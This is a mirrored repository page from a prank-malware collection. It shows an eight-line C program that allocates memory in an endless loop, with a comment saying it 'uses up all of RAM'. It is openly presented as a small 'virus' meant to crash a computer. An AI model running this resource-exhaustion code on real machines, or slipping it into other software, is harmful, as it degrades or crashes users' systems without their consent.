mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-22 23:26:26 -08:00
8 lines
211 B
C
8 lines
211 B
C
// Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX
|
|
// Usees up all of RAM.
|
|
|
|
int main(){
|
|
while(malloc(1000));
|
|
return 0;
|
|
}
|